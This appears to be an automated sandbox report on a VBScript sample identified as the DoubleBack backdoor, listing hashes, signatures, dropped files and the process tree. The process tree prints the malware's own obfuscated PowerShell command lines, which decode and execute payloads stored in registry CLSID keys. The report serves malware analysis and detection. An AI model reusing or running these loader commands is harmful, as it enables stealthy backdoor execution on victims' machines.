Overview

overview

10

Static

static

rezidende.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    98s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-01-2023 13:17

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    rezidende.vbs

  • Size

    1KB

  • MD5

    a0b04a7f13d1e54a99b07d3f293c1ce5

  • SHA1

    75555b065adf05b9364a04dd88a7b0d2e96c6a6c

  • SHA256

    213aac6cd084401cdcaa0abc3d790009f08882e68228a314c511cf1d9ddc90e6

  • SHA512

    b7f4934d480d6eb5762342a072be6d997eb4278f9c41fad1c609b473c37b8603557178fb3a2eada02f38356c37d6c80cf3e3b015a32d6f5932847652693a0293

Score
10/10
doublebackbackdoor

Malware Config

Signatures

  • DoubleBack

    DoubleBack is a modular backdoor first seen in December 2020.

    backdoordoubleback
  • DoubleBack x64 payload 4 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Modifies registry class 24 IoCs
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\rezidende.vbs"
    1⤵
    • Blocklisted process makes network request
    PID:4088
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -file C:\ProgramData\fw435tv345t.ps1
    1⤵
    • Process spawned unexpected child process
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3552
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "& {(-join('24696A79646D78733D2730373045273B285B546578742E456E636F64696E675D3A3A555446382E476574537472696E67282867702027686B6C6D3A5C736F6674776172655C636C61737365735C434C5349445C7B30313034304530362D303730322D313130332D304330302D3039303530383046303730457D5C50726F67494427292E24696A79646D787329297C2E28244572726F72416374696F6E507265666572656E63652E546F537472696E6728295B244D6178696D756D486973746F7279436F756E742D7368722831333834392D3133383339295D2B24505353657373696F6E436F6E66696775726174696F6E4E616D655B2828244D6178696D756D486973746F7279436F756E742D7368722831303039312D313030383229292B2831373035392D313730353729295D2B244F7574707574456E636F64696E672E456E636F64657246616C6C6261636B2E546F537472696E6728295B2828244D6178696D756D486973746F7279436F756E742D7368722831303039312D313030383229292B31295D29'-split'(..)'|?{$_}|%{[char][convert]::ToUInt32($_,16)}))|.($ErrorActionPreference.ToString()[$FormatEnumerationLimit]+$PSSessionConfigurationName[(($FormatEnumerationLimit-shl1)+(19817-19815))]+$OutputEncoding.EncoderFallback.ToString()[(($MaximumHistoryCount-shr(16254-16245))+1)])}"
      2⤵
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2036
      • C:\Windows\system32\msiexec.exe
        msiexec.exe
        3⤵
          PID:3308
        • C:\Windows\system32\msiexec.exe
          msiexec.exe
          3⤵
          • Blocklisted process makes network request
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:216
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -c "&{$v1='6402';$k1='hkcu:\Software\Classes\CLSID';$p1=(gp $k1).$v1;rp $k1 $v1;set-itemproperty -pat $k1 -n $v1 -va (($p1|iex)|out-string);exit}"
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2768

    Network

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\fw435tv345t.ps1
      Filesize

      209KB

      MD5

      1a372d294f7fc2aec07fe1f95d69993e

      SHA1

      b55fa9e34688b2a9fed4aff0ab17f9338527ecf5

      SHA256

      67be40bb6a22dd970a20998743e4c38ad17a0449c1868fa350515a48168ec407

      SHA512

      465c86a92f6a6688154b59f4e3e0e2a7f68d6a7261039bc1620b47d8e411da3f1a2416e46630ad76458af5b57b24f2aea8813371b07071c11f306f5b2837acb3

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
      Filesize

      53KB

      MD5

      a26df49623eff12a70a93f649776dab7

      SHA1

      efb53bd0df3ac34bd119adf8788127ad57e53803

      SHA256

      4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

      SHA512

      e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

      Download Submit

    • memory/216-149-0x0000000180000000-0x000000018000F000-memory.dmp

      Filesize

      60KB

      Download

    • memory/216-145-0x0000000180000000-0x000000018000F000-memory.dmp

      Filesize

      60KB

      Download

    • memory/216-144-0x0000000000000000-mapping.dmp

      Download

    • memory/2036-140-0x00007FFFE1480000-0x00007FFFE1F41000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2036-137-0x0000000000000000-mapping.dmp

      Download

    • memory/2036-142-0x0000025BD33C0000-0x0000025BD33CB000-memory.dmp

      Filesize

      44KB

      Download

    • memory/2036-143-0x0000000180000000-0x000000018000F000-memory.dmp

      Filesize

      60KB

      Download

    • memory/2036-148-0x00007FFFE1480000-0x00007FFFE1F41000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2768-146-0x0000000000000000-mapping.dmp

      Download

    • memory/2768-147-0x00007FFFE1480000-0x00007FFFE1F41000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3308-141-0x0000000000000000-mapping.dmp

      Download

    • memory/3552-138-0x0000029F611D0000-0x0000029F61246000-memory.dmp

      Filesize

      472KB

      Download

    • memory/3552-132-0x0000029F5EFB0000-0x0000029F5EFD2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/3552-136-0x00007FFFE1480000-0x00007FFFE1F41000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3552-134-0x0000029F609B0000-0x0000029F609F4000-memory.dmp

      Filesize

      272KB

      Download

    • memory/3552-133-0x00007FFFE1480000-0x00007FFFE1F41000-memory.dmp

      Filesize

      10.8MB

      Download